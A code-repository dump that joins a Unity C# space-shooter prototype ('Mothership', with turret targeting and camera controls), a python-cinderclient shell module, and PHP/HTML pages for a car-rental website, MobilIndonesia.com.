c38b8e4a9a8e644e24525ffcf1697f35d3ca0dc0
00e5ad5b01e1ad1035394756c87aa2aab47771d3
refs/heads/master
<repo_name>Ryxali/Mothership<file_sep>/Mothership/Assets/ShipController.cs using UnityEngine; using System.Collections; public class ShipController : MonoBehaviour { public bool online { get; private set; } public void enable() { online = true; Turret [] turrs = transform.GetComponentsInChildren<Turret> (); foreach (Turret t in turrs) { t.activate(); } TurretSlot[] tslots = transform.GetComponentsInChildren<TurretSlot> (); foreach (TurretSlot t in tslots) { t.hide (); } } public void disable() { online = false; Turret [] turrs = transform.GetComponentsInChildren<Turret> (); foreach (Turret t in turrs) { t.deactivate(); } TurretSlot[] tslots = transform.GetComponentsInChildren<TurretSlot> (); foreach (TurretSlot t in tslots) { t.show (); } } // Update is called once per frame void Update () { if (online) { GetComponent<Rigidbody2D>().velocity = transform.TransformDirection(Vector2.up) * Input.GetAxis("Vertical"); GetComponent<Rigidbody2D>().angularVelocity = -Input.GetAxis("Horizontal") * 90; } } } <file_sep>/Mothership/Assets/CameraZoom.cs using UnityEngine; using System.Collections; public class CameraZoom : MonoBehaviour { [Range(10, 1)] public float maxZoom = 2; [Range(20, 10)] public float minZoom = 10; private float baseSize; private float curZoom = 10; // Use this for initialization void Start () { baseSize = GetComponent<Camera>().orthographicSize; } // Update is called once per frame void Update () { curZoom -= Input.GetAxis ("Mouse ScrollWheel") * 4; curZoom = Mathf.Clamp (curZoom, maxZoom, minZoom); GetComponent<Camera>().orthographicSize = baseSize * curZoom / 10.0f; } } <file_sep>/Source/Mothership/MothershipGameMode.cpp // Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #include "Mothership.h" #include "MothershipGameMode.h" #include "MothershipPawn.h" AMothershipGameMode::AMothershipGameMode() { // set default pawn class to our character class DefaultPawnClass = AMothershipPawn::StaticClass(); } <file_sep>/Mothership/Assets/Turret.cs using UnityEngine; using System.Collections; using System.Collections.Generic; using System.Linq; [ExecuteInEditMode] public class Turret : MonoBehaviour { public float radius_L { get; private set; } public float radius_R { get; private set; } public float maxAttackRadius = 30.0f; public float maxAttackRadius_L = 0; public float maxAttackRadius_R = 0; public int maxTargets = 1; public TurretSize size; public bool instantiated { get; private set; } public bool online { get; private set; } protected Enemy[] targets; public void instantiate(TurretSlot s) { radius_L = Mathf.Min(s.maxAttackRadius + s.maxAttackRadius_L, maxAttackRadius + maxAttackRadius_L); radius_R = Mathf.Min(s.maxAttackRadius + s.maxAttackRadius_R, maxAttackRadius + maxAttackRadius_R); instantiated = true; } void Update () { if (Application.isEditor) { maxAttackRadius = Mathf.Max((Mathf.Min(maxAttackRadius*2 + maxAttackRadius_L + maxAttackRadius_R, 360) - maxAttackRadius_L - maxAttackRadius_R)/2, 0); maxAttackRadius_L = Mathf.Max(Mathf.Min(maxAttackRadius_L, 180-maxAttackRadius), 0); maxAttackRadius_R = Mathf.Max(Mathf.Min(maxAttackRadius_R, 180-maxAttackRadius), 0); Vector3 l = transform.TransformDirection(Vector3.up); Vector3 r = transform.TransformDirection(Vector3.up); Quaternion ql = Quaternion.AngleAxis((-maxAttackRadius - maxAttackRadius_L), Vector3.back); Quaternion qr = Quaternion.AngleAxis((maxAttackRadius + maxAttackRadius_R), Vector3.back); l = ql * l; r = qr * r; Vector3 l2 = transform.TransformDirection(Vector3.up); Vector3 r2 = transform.TransformDirection(Vector3.up); Quaternion ql2 = Quaternion.AngleAxis((-radius_L), Vector3.back); Quaternion qr2 = Quaternion.AngleAxis((radius_R), Vector3.back); l2 = ql2 * l2; r2 = qr2* r2; Debug.DrawLine(transform.position, transform.position + l, Color.yellow); Debug.DrawLine(transform.position, transform.position + r, Color.yellow); Debug.DrawLine(transform.position, transform.position + l2, Color.red); Debug.DrawLine(transform.position, transform.position + r2, Color.red); } if (Application.isPlaying) { if(online) { targets = findTargets (maxTargets); if(targets != null && targets.Length > 0) { fire(); } } } } protected virtual void fire() { } public Enemy[] findTargets(int count) { Enemy[] enemies = GameController.instance.enemies.list; List<Enemy> candidates = new List<Enemy> (); Enemy candidate = null; float candidateDist = 100000.0f; foreach(Enemy e in enemies) { Vector3 x = Vector3.Cross(transform.up, Vector3.back); //Debug.Log("Cross: " + x); /*Debug.Log("dir: " + transform.up);/* float angle = Vector3.Dot( x, e.transform.position - transform.position);*/ float side = Vector3.Dot( x, e.transform.position - transform.TransformPoint(transform.localPosition)); float angle = Vector3.Angle(transform.up, (e.transform.position - transform.position).normalized); //Debug.Log("ANGLE: " + angle); if(side < 0) { if(angle < radius_L) { candidates.Add(e); /*float dist = Vector3.Distance(transform.position, e.transform.position); if(dist < candidateDist) { candidate = e; candidateDist = dist; }*/ } } else { if(angle < radius_R) { candidates.Add(e); /*float dist = Vector3.Distance(transform.position, e.transform.position); if(dist < candidateDist) { candidate = e; candidateDist = dist; }*/ } } } candidates = candidates.OrderBy (o => Vector3.Distance (transform.position, o.transform.position)).ToList (); Enemy[] result = new Enemy[Mathf.Min(candidates.Count, count)]; for (int i = 0; i < result.Length; ++i) { result[i] = candidates[i]; } return result; } public void activate() { online = true; } public void deactivate() { online = false; } } <file_sep>/Source/Mothership/MothershipGameMode.h // Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #pragma once #include "GameFramework/GameMode.h" #include "MothershipGameMode.generated.h" UCLASS(minimalapi) class AMothershipGameMode : public AGameMode { GENERATED_BODY() public: AMothershipGameMode(); }; <file_sep>/Mothership/Assets/ButtonActions.cs using UnityEngine; using System.Collections; public class ButtonActions : MonoBehaviour { public void enterScene(string name) { Global.addToHistory (Application.loadedLevelName); Application.LoadLevel (name); } public void goBack(int count = 1) { string s = "null"; for(int i = 0; i < count; ++i) { string t = Global.popFromHistory (); if(t != null) s = t; } if(!s.Equals("null")) Application.LoadLevel (s); } public void goBackOne() { goBack (1); } public void exit() { Application.Quit (); } } <file_sep>/Mothership/Assets/Util.cs using UnityEngine; using System.Collections; public class Util { public static void Lookat(Transform subject, Transform target) { Vector3 diff = target.position - subject.position; diff.Normalize(); float rot_z = Mathf.Atan2(diff.y, diff.x) * Mathf.Rad2Deg; subject.rotation = Quaternion.Euler(0f, 0f, rot_z - 90); } /// <summary> /// Causes the subject to look towards the target. This function will only move a fraction /// for each call. /// </summary> /// <returns><c>true</c>, if the new angle is within 10 degrees of the target, <c>false</c> otherwise.</returns> /// <param name="subject">Subject.</param> /// <param name="target">Target.</param> public static bool LookTowards(Transform subject, Transform target) { Vector3 diff = target.position - subject.position; diff.Normalize(); float rot_z = Mathf.Atan2(diff.y, diff.x) * Mathf.Rad2Deg; Quaternion q = Quaternion.Euler(0f, 0f, rot_z - 90); subject.rotation = Quaternion.Lerp (subject.rotation, q, 0.1f); return q.eulerAngles.z - subject.eulerAngles.z < 10.0f; } } <file_sep>/Mothership/Assets/SMG_Turret.cs using UnityEngine; using System.Collections; public class SMG_Turret : Turret { public Projectile bullet; public Transform spawnPoint; public Transform axis; public float cooldown = 0.6f; public float projectileSpeed; private float lastShot; protected override void fire() { /*axis.LookAt (target.transform.position, Vector3.forward); Vector3 rot = axis.transform.eulerAngles; rot.z = 0; axis.transform.eulerAngles = rot;*/ Enemy target = targets [0]; if (Util.LookTowards (axis, target.transform)) { if (lastShot + cooldown < Time.time) { lastShot = Time.time; Projectile p = (Projectile)Instantiate (bullet); p.transform.position = spawnPoint.position; p.tag = tag; p.GetComponent<Rigidbody2D>().velocity = (target.transform.position - spawnPoint.position).normalized * projectileSpeed; GameController.instance.projectiles.add (p); } } } } <file_sep>/Mothership/Assets/CameraPan.cs using UnityEngine; using System.Collections; public class CameraPan : MonoBehaviour { public Rect bounds = new Rect(-2, -2, 4, 4); [Range(10, 1)] public float maxZoom = 2; [Range(20, 10)] public float minZoom = 10; private float baseSize; private float curZoom = 10; private bool moving = false; private Vector3 movePoint; private Vector3 anchor; private Camera cam; // Use this for initialization void Awake () { cam = GetComponentInChildren<Camera> (); baseSize = cam.orthographicSize; } // Update is called once per frame void FixedUpdate () { curZoom -= Input.GetAxis ("Mouse ScrollWheel") * 4; curZoom = Mathf.Clamp (curZoom, maxZoom, minZoom); cam.orthographicSize = baseSize * curZoom / 10.0f; if (moving) { transform.position = anchor + (movePoint - Input.mousePosition) * 0.01f * (curZoom / 10.0f); } } void Update() { if (Input.GetMouseButtonDown (2)) { movePoint = Input.mousePosition; anchor = transform.position; moving = true; } if (Input.GetMouseButtonUp (2)) { moving = false; } } } <file_sep>/Config/DefaultGame.ini [/Script/EngineSettings.GeneralProjectSettings] ProjectID=0615A7C74D365436501038A85503E2FD ProjectName=Twin Stick Game Template [/Script/Mothership.MothershipCharacter] FixedCameraPitch=-45.0 FixedCameraDistance=1500.0 [StartupActions] bAddPacks=True InsertPack=(PackSource="StarterContent.upack",PackName="StarterContent") <file_sep>/Mothership/Assets/Projectile.cs using UnityEngine; using System.Collections; [RequireComponent(typeof(Rigidbody2D))] [RequireComponent(typeof(Collider2D))] public class Projectile : MonoBehaviour { Vector3 start; void OnTriggerEnter2D(Collider2D other) { if(other.gameObject.GetComponentInChildren<Enemy>() != null) Destroy (gameObject); } void Awake() { start = transform.position; } void Update() { if(Vector3.Distance(start, transform.position) > 100) { Destroy(gameObject); } } } <file_sep>/Mothership/Assets/TurretSize.cs using UnityEngine; using System.Collections; public enum TurretSize { TINY, SMALL, MEDIUM, LARGE }<file_sep>/Mothership/Assets/GameController.cs using UnityEngine; using System.Collections; public class GameController : MonoBehaviour { public static GameController instance { get; private set; } public Enemies enemies { get; private set; } public ShipController ship { get; private set; } public Projectiles projectiles { get; private set; } // Use this for initialization void Awake () { if (instance != null) Debug.LogError ("Multiple controllers!"); instance = this; enemies = GetComponentInChildren<Enemies> (); projectiles = GetComponentInChildren<Projectiles> (); ship = FindObjectOfType<ShipController> (); ship.enable (); } } <file_sep>/Mothership/Assets/Global.cs using UnityEngine; using System.Collections; using System.Collections.Generic; public class Global : MonoBehaviour { private static Stack<string> sceneHistory = new Stack<string>(); public static void addToHistory(string scene) { sceneHistory.Push (scene); } public static string popFromHistory() { return sceneHistory.Pop (); } public static string peekFromHistory() { return sceneHistory.Peek (); } } <file_sep>/Mothership/Assets/TurretSlot.cs using UnityEngine; using System.Collections; [ExecuteInEditMode] public class TurretSlot : MonoBehaviour { public float maxAttackRadius = 30.0f; public float maxAttackRadius_L = 0; public float maxAttackRadius_R = 0; public Turret turret { get; private set; } public GameObject indicator; public TurretSize size; public bool hidden { get; private set; } // Use this for initialization void Awake () { if (indicator == null) { Debug.LogError("indicator is null!"); } } // Update is called once per frame void Update () { if (Application.isEditor) { maxAttackRadius = Mathf.Max((Mathf.Min(maxAttackRadius*2 + maxAttackRadius_L + maxAttackRadius_R, 360) - maxAttackRadius_L - maxAttackRadius_R)/2, 0); maxAttackRadius_L = Mathf.Max(Mathf.Min(maxAttackRadius_L, 180-maxAttackRadius), 0); maxAttackRadius_R = Mathf.Max(Mathf.Min(maxAttackRadius_R, 180-maxAttackRadius), 0); Vector3 l = transform.TransformDirection(Vector3.up); Vector3 r = transform.TransformDirection(Vector3.up); Quaternion ql = Quaternion.AngleAxis((-maxAttackRadius - maxAttackRadius_L), Vector3.back); Quaternion qr = Quaternion.AngleAxis((maxAttackRadius + maxAttackRadius_R), Vector3.back); l = ql * l; r = qr * r; Debug.DrawLine(transform.position, transform.position + l, Color.green); Debug.DrawLine(transform.position, transform.position + r, Color.green); } else { } } public void addTurret(Turret t) { Debug.Log ("addy"); if (!fits (t.size)) return; if (turret != null) { Destroy(turret.gameObject); } if (t.instantiated) { Debug.LogError("Tried to add an instantiated turret!"); return; } turret = (Turret)Instantiate(t); turret.transform.parent = transform; turret.transform.position = transform.position; turret.transform.rotation = transform.rotation; turret.tag = tag; turret.instantiate (this); if (indicator != null) indicator.SetActive (false); } public void removeTurret() { if (turret != null) { Destroy(turret); } if (indicator != null) indicator.SetActive (true); } void OnMouseUp() { Debug.Log ("FOO"); if (hidden) return; if (CurrentTool.instance.current != null) { addTurret(CurrentTool.instance.current); } } public bool fits(TurretSize t) { switch (size) { case TurretSize.LARGE: return true; //goto case TurretSize.MEDIUM; case TurretSize.MEDIUM: if(t == TurretSize.MEDIUM) return true; goto case TurretSize.SMALL; case TurretSize.SMALL: if(t == TurretSize.SMALL) return true; goto case TurretSize.TINY; case TurretSize.TINY: if(t == TurretSize.TINY) return true; return false; default: Debug.LogError("Wierd enum: " + t); return false; } } public void hide() { hidden = true; indicator.SetActive (false); } public void show() { indicator.SetActive (true); } } <file_sep>/Source/Mothership/Mothership.cpp // Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #include "Mothership.h" IMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, Mothership, "Mothership" ); DEFINE_LOG_CATEGORY(LogMothership) <file_sep>/Mothership/Assets/CameraFollow.cs using UnityEngine; using System.Collections; public class CameraFollow : MonoBehaviour { Transform target; // Use this for initialization void Awake () { target = FindObjectOfType<ShipController> ().transform; } // Update is called once per frame void FixedUpdate () { if (target != null) { transform.position = Vector3.Lerp(transform.position, target.position, 0.2f); } } } <file_sep>/Mothership/Assets/Plasma_Turret.cs using UnityEngine; using System.Collections; public class Plasma_Turret : Turret { public Projectile bullet; public float spawnDistance = 0.2f; public float cooldown = 1.0f; public float projectileSpeed = 4; private float lastShot; protected override void fire() { if (lastShot + cooldown < Time.time) { lastShot = Time.time; foreach(Enemy target in targets) { Projectile p = (Projectile) Instantiate(bullet); p.transform.position = transform.position + (target.transform.position - transform.TransformPoint(transform.localPosition)).normalized * spawnDistance; p.tag = tag; p.GetComponent<Rigidbody2D>().velocity = (target.transform.position - p.transform.position).normalized * projectileSpeed; GameController.instance.projectiles.add(p); } } } } <file_sep>/Mothership/Assets/Enemies.cs using UnityEngine; using System.Collections; public class Enemies : MonoBehaviour { public Enemy[] list { get { return _list; } } private Enemy[] _list = new Enemy[0]; void Update() { } void LateUpdate() { _list = transform.GetComponentsInChildren<Enemy> (); } public void add(Enemy enemy) { enemy.transform.parent = transform; } } <file_sep>/Mothership/Assets/Tooltip.cs using UnityEngine; using UnityEngine.UI; using System.Collections; [RequireComponent(typeof(Text))] public class Tooltip : MonoBehaviour { private Text t; void Awake() { t = GetComponent<Text> (); } public void setText(string text) { t.text = text; } } <file_sep>/Mothership/Assets/Projectiles.cs using UnityEngine; using System.Collections; public class Projectiles : MonoBehaviour { public void add(Projectile projectile) { projectile.transform.parent = transform; } }
96757e74aded24eb00d5a3c16c37252dda7383b9
[ "C#", "C++", "INI" ]
21
C#
Ryxali/Mothership
fdd88c468fb15450f38b3958057c97e4bebe3a2f
24eaf960bc54d621dbab5a4dbd4572629a0829bd
refs/heads/master
<repo_name>geosharath/python-cinderclient<file_sep>/cinderclient/v2/shell.py # Copyright (c) 2013-2014 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. from cinderclient.v3.shell import * # flake8: noqa from cinderclient import utils utils.retype_method('volumev3', 'volumev2', globals()) # Below is shameless hack for unit tests # TODO remove after deciding if unit tests are moved to /v3/ dir def _treeizeAvailabilityZone(zone): """Builds a tree view for availability zones.""" AvailabilityZone = availability_zones.AvailabilityZone az = AvailabilityZone(zone.manager, copy.deepcopy(zone._info), zone._loaded) result = [] # Zone tree view item az.zoneName = zone.zoneName az.zoneState = ('available' if zone.zoneState['available'] else 'not available') az._info['zoneName'] = az.zoneName az._info['zoneState'] = az.zoneState result.append(az) if getattr(zone, "hosts", None) and zone.hosts is not None: for (host, services) in zone.hosts.items(): # Host tree view item az = AvailabilityZone(zone.manager, copy.deepcopy(zone._info), zone._loaded) az.zoneName = '|- %s' % host az.zoneState = '' az._info['zoneName'] = az.zoneName az._info['zoneState'] = az.zoneState result.append(az) for (svc, state) in services.items(): # Service tree view item az = AvailabilityZone(zone.manager, copy.deepcopy(zone._info), zone._loaded) az.zoneName = '| |- %s' % svc az.zoneState = '%s %s %s' % ( 'enabled' if state['active'] else 'disabled', ':-)' if state['available'] else 'XXX', state['updated_at']) az._info['zoneName'] = az.zoneName az._info['zoneState'] = az.zoneState result.append(az) return result
97c71589aa33441a5336348eb78ef707fe0a6df4
[ "Python" ]
1
Python
geosharath/python-cinderclient
d07b424bed6c462b6075f9a3f7ae066a0bb4d49c
77e88be4a599f40fd197611ed48366338c4134d3
refs/heads/master
<file_sep><html> <head> <title>Jenis Kendaraan - MobilIndonesia.com</title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>JENIS KENDARAAN</center></h2> </div> <div class="text-center"> <h4>KENDARAAN YANG TERSEDIA DI</h4> <h2>MOBILINDONESIA.COM</h2> <p>Ada banyak jenis kendaraan yang tersedia di kami,salah satu nya yang ada di list dibawah ini</p> <div class="jenis-mobil"> <div class="mobil"> <img src="img/apv.jpg"> <p> SUZUKI APV<br> KEADAAN RAPIH<br> 1495 CC<br> RP : 1.3 JT/HARI </p> </div> <div class="mobil"> <img src="img/jazz.jpg"> <p> HONDA JAZZ<br> KEADAAN SANGAT BAIK<br> 1497 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/ayla.jpg"> <p> DAIHATSU AYLA<br> KEADAAN SANGAT BAIK<br> 998 CC<br> 1 JT/HARI </p> </div> <div class="mobil"> <img src="img/swift.jpg"> <p> SUZUKI SWIFT<br> KEADAAN SANGAT BAIK<br> 1372 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/agya.jpg"> <p> TOYOTA AGYA<br> KEADAAN SANGAT BAIK<br> 1200 CC<br> 1.3 JT/HARI </p> </div> <div class="mobil"> <img src="img/terios.jpg"> <p> DAIHATSU TERIOS<br> KEADAAN SANGAT BAIK<br> 1496 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/expander_banyak.jpg"> <p> MITSUBISHI EXPANDER<br> KEADAAN SANGAT BAIK<br> 1499 CC<br> 1.7 JT/HARI </p> </div> <div class="mobil"> <img src="img/brio.jpg"> <p> <NAME><br> KEADAAN SANGAT BAIK<br> 1198 CC<br> 1.4 JT/HARI </p> </div> <div class="mobil"> <img src="img/picanto.jpg"> <p> KIA PICANTO<br> KEADAAN SANGAT BAIK<br> 1250CC<br> 1.1 JT/HARI </p> </div> <br class="clear"> </div> </div> <?php include("footer.php"); ?> </body> <html> <file_sep># MobilIndonesia.com Tampilan FronEnd Website penyewaan mobil dengan CSS (belum belum terdapat fungsi apapun). ![HomeMobil](https://user-images.githubusercontent.com/56223221/216827552-3f68cca8-8cab-4114-8014-53016a0d0385.png) ![TestiMobil](https://user-images.githubusercontent.com/56223221/216827611-06a1903f-eb70-454a-8294-f4b28afdbf0c.png) ![JenisMobil](https://user-images.githubusercontent.com/56223221/216827597-6a0e584c-055d-42b6-8f5b-06ed021fd225.png) <file_sep><html> <head> <title>About - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>ABOUT</center></h2> </div> <div> <div class="banner"> <div class="slogan"> <h1>MOBILINDONEISA.COM</h1> <p>kami menyediakan berbagai jenis kendaraan untuk kalian sewa, baik itu kendaraan kecil atau kendaraan sejenis travel, kami juga menyediakan penyewaan supir, tentunya dengan banyak diskon yang akan kalian dapat.</p> <h4>Yuu sewa kendaraan di MOBILINDONESIA.COM</h4> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/about.png" alt=""> </div> </div> <br class="clear"> </div> <div> <div class="section-header"> <h2>Profil Perusahaan</h2> </div> <div class="perusahaan"> <p>MOBILINDONESIA.COM merupakan sebuah perusahaan rental Mobil terbesar saat ini, sudah dangat dipercayai oleh berbagai pihak. Kami juga menyediakan banyak jenis kendaraan yang bisa anda pesan. Untuk lebih jelasnya tentang kendaraan yang ada di perusahaan kami silahkan mengunjungi bagian Kendaraan.</p> </div> </div> <div class="text-center"> <div class="section-header"> <h1 class="title"><NAME></h1> </div> <div class="about img"> <img src="img/ihsan.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Ihsan Taofik</h2> <p class="text-center">10119315</p> <h2 class="text-center">DIREKTUR KEUANGAN</h2> </div> <div class="about img"> <img src="img/adi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Adi Rizal</h2> <p class="text-center">10119318</p> <h2 class="text-center">DIREKTUR IT</h2> </div> <div class="about img"> <img src="img/aldy.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119297</p> <h2 class="text-center">PRESIDENT DIREKTUR</h2> </div> <br class="clear"> <div class="about img"> <img src="img/lutfi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Lutfi Azmi</h2> <p class="text-center">10119326</p> <h2 class="text-center">DIREKTUR PEMASARAN</h2> </div> <div class="about img"> <img src="img/rafi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119329</p> <h2 class="text-center">DIREKTUR SDM</h2> </div> <div class="about img"> <img src="img/john.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119349</p> <h2 class="text-center">DIREKTUR ASET</h2> </div> <br class="clear"> <div class="jurusan"> <h3 id="kelas-container" class="text-center"></h3> <h3 id="jurusan-container" class=" text-center"></h3> <h3 id="fakultas-container" class="text-center"></h3> </div> </div> <script> kelas = 'IF-8'; jurusan = 'Teknik Informatika'; fakultas = 'Fakultas Teknik & Ilmu Komputer'; document.getElementById('kelas-container').innerHTML = kelas; document.getElementById('jurusan-container').innerHTML = jurusan; document.getElementById('fakultas-container').innerHTML = fakultas; </script> <?php include("footer.php"); ?> </body> </html> <file_sep> <html> <head> <title>Hubungi Kami - MobilIndonesia.com</title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>HUBUNGI KAMI</center></h2> </div> <div class="halaman halaman-testimoni"> <h2>Sosial Media</h2> <p>Facebook : <a href="#">https://www.facebook.com/mobilindonesia.com</a>.</p> <p>Website : <a href="#">https://www.website.com/mobilindonesia.com</a>.</p> <p>Twitter : <a href="#">https://www.twitter.com/mobilindonesia.com</a>.</p> <p>Instagram : <a href="#">https://www.instagram.com/mobilindonesia.com</a>.</p> </div> <?php include("footer.php"); ?> </body> </html><file_sep><html> <head> <title>Testimoni - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>TESTIMONI</center></h2> </div> <div> <div class="banner"> <div class="slogan"> <h2>TESTIMONI PENGUNJUNG MOBILINDONEISA.COM</h2> <p>Ragu dengan apa yang sudah anda lihat semua ini, Tenang kami mempunya beberapa Feedback dari pelanggan kami yang mungkin bisa memastikan anda.</p> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/testimoni.png" alt=""> </div> </div> </div> <br class="clear"> <div class="testimoni-content "> <div class="testimoni-pengunjung"> <img src="img/artis1.jpg"> <p>Sangat bagus, sangat recomended untuk kalian coba</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis2.jpg"> <p>Bagus banget, selain murah banyak diskon juga yang akan kita dapet ketika kita pesan sekalian sama supirnya</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis3.jpg"> <p>Mobilnya bagus bagus, perjalanan jauh jadi nyaman, recomended dehh....</p> </div> <br class="clear"> <div class="testimoni-pengunjung"> <img src="img/artis4.jpg"> <p>Sangat bagus, sangat recomended untuk kalian coba</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis5.jpg"> <p>Bagus banget, selain murah banyak diskon juga yang akan kita dapet ketika kita pesan sekalian sama supirnya</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis6.jpg"> <p>Mobilnya bagus bagus, perjalanan jauh jadi nyaman, recomended dehh....</p> </div> <br class= "clear"> </div> <?php include("footer.php"); ?> </body> </html><file_sep><html> <head> <title> Penyewaan - MobilIndonesia.com </title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>PENYEWAAN</center></h2> </div> <div> <table class="center"> <tr> <td> <table> <tr> <td colspan="2"> <h2>Input Pembayaran</h2> </td> </tr> <tr> <td><NAME></td> <td><input class = "warna"type="text" id="input_nim" size="25" onFocus="sorot(this)" onBlur="hilang(this)"/></td> </tr> <tr> <td>Pilihan Mobil</td> <td> <select id="input_mobil" onFocus="sorot(this)" onBlur="hilang(this)"> <option value="Toyota Avanza">Toyota Avanza</option> <option value="Daihatsu Terios">Daihatsu Terios</option> <option value="Honda jazz">Honda jazz</option> <option value="Suzuki APV">Suzuki APV</option> </select> </td> </tr> <tr> <td>Tanggal Sewa</td> <td><input type="text" id="tanggal_sewa" size="25" onFocus="sorot(this)" onBlur="hilang(this)" /></td> </tr> <tr> <td>Lama Sewa</td> <td><input type="text" id="lama_sewa" size="25" onFocus="sorot(this)" onBlur="hilang(this)" /></td> </tr> <tr> <td>Sewa Supir</td> <td> <input type="checkbox" id="input_member" value="true" /> Ya </td> </tr> <tr> <td colspan="2"> <button id="button_tampilkan" onClick="tampil();">Tampil</button> <button id="button_hapus" onClick="hapus();">Hapus</button> </td> </tr> </table> <table class="table-output"> <tr> <td colspan="2"> <h2>Output Pembayaran</h2> </td> </tr> <tr> <td>Mobil Yang Disewa</td> <td><input type="text" id="output_sewa" /></td> </tr> <tr> <td>Tanggal Sewa</td> <td><input type="text" id="output_tanggal_sewa"/></td> </tr> <tr> <td>Harga Sewa</td> <td><input type="text" id="output_harga_sewa" /></td> </tr> <tr> <td>Subtotal</td> <td><input type="text" id="output_subtotal" /></td> </tr> <tr> <td>Total Biaya supir</td> <td><input type="text" id="output_biaya_supir" /></td> </tr> <tr> <td>Diskon</td> <td><input type="text" id="output_diskon" /></td> </tr> <tr> <td>Total Pembayaran</td> <td><input type="text" id="output_total_pembayaran" /></td> </tr> </table> </td> </tr> </table> </div> <div class="table-output buttom"> <p class="text-center">Terima kasih sudah berkunjung, semoga anda bisa menikmati pelayanan dari kami.</p> </div> <script> var tanggal = new Date (); var hari = new Array ("Senin","Selasa","Rabu","Kamis","Jumat","Sabtu"); var bulan = new Array ("Januari","Februari","Maret","April","Mei","Juni","Juli","Agustus","September","Oktober","November","Desember"); var hari_ini = hari [tanggal.getDay()]; var tgl = tanggal.getDate(); var bln = bulan[tanggal.getMonth()]; var thn = tanggal.getFullYear(); document.getElementById('tanggal_sewa').value = ( tgl +" "+ bln +" "+ thn); function tampil() { document.getElementById('output_sewa').value = document.getElementById('output_sewa').value; if (document.getElementById('output_sewa').value == 'Toyota Avanza') { var harga = 450000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 'Daihatsu Terios') { var harga = 300000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 'Honda Jazz') { var harga = 600000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 'Suzuki APV') { var harga = 500000; document.getElementById('output_harga_sewa').value = harga; } else { var harga = 65000; document.getElementById('output_harga_sewa').value = harga; } document.getElementById('output_sewa').value = document.getElementById('input_mobil').value; if ( document.getElementById('lama_sewa').value >= 5 && document.getElementById('lama_sewa').value < 10) { var diskon = (document.getElementById('lama_sewa').value * harga) * 0.10; var sub_total = (document.getElementById('lama_sewa').value * harga) - diskon ; } else if ( document.getElementById('lama_sewa').value >= 10) { var diskon = (document.getElementById('lama_sewa').value * harga) * 0.25; var sub_total = (document.getElementById('lama_sewa').value * harga) - diskon ; } else { var diskon = ''; var sub_total = ''; } document.getElementById('output_subtotal').value = sub_total; if (document.getElementById('input_member').checked == true) { var bayar_supir = 75000 * document.getElementById('lama_sewa').value; } else { var bayar_supir =''; } document.getElementById('output_biaya_supir').value = bayar_supir; document.getElementById('output_diskon').value = diskon; document.getElementById('output_total_pembayaran').value = sub_total + bayar_supir; document.getElementById('output_tanggal_sewa').value = document.getElementById('tanggal_sewa').value; } </script> </center> </div> <?php include("footer.php"); ?> </body> </html><file_sep><!DOCTYPE html> <html> <head> <title>Home - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="banner-container"> <div class="banner"> <div class="slogan"> <h1>MOBILINDONEISA.COM</h1> <h2>RENTAL MOBIL TERBAIK YANG ADA SAAT INI</h2> <p>Selamat datang di MOBILINDONESIA.COM kami mengutamakan pelayanan terbaik demi membuat kesan terbaik</p> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/logo.png" alt=""> </div> </div> <br class="clear"> </div> <div class="section-header"> <h2>TRENDING DI MOBILINDONESIA.COM</h2> <p>PELAYANAN ADALAH YANG UTAMA BAGI KAMI</p> </div> <div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilAvanza, gantiGambarAvanza[baru])" onMouseout ="gantiGambar (mobilAvanza, gantiGambarAvanza[sumber])"> <img src="img/avanza.jpg" 